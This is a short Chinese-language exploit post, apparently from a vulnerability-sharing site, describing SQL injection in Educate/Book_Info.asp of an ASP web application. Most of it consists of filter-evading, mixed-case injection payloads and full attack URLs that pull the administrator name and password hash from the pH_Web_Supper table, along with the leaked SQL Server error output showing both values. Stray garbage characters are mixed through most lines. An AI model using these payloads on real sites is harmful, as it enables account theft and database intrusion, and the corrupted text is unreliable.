漏洞出现在Educate/Book_Info.asp
9 f- |4 r& f# M) f此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出3 _ }: o2 E# O; r7 e0 ]" c' t
exp:如下% x9 H3 P( c% o) `
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)7 p- r0 Z7 ~% i# x4 V5 | |
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ A( s% \+ ^5 O8 V* l6 _http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 s: ?" `, O/ Q7 s/ W8 a0 d& p EMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
: t; F7 e3 ^) D$ V5 B+ L* `2 N! |将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。2 b/ ^7 U. B; q5 d0 N& j9 g" }
/Educate/Book_Info.asp,行 8
0 d& b2 J3 j. q* _0 G ^http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 z( Q, D* L/ O) I# ~Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ g1 H3 k" m) n8 o# Z- \+ p; G3 K2 r4 f将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
* @/ Q: I; r8 b) H* K, o4 m' F; X/ H/Educate/Book_Info.asp,行 8 |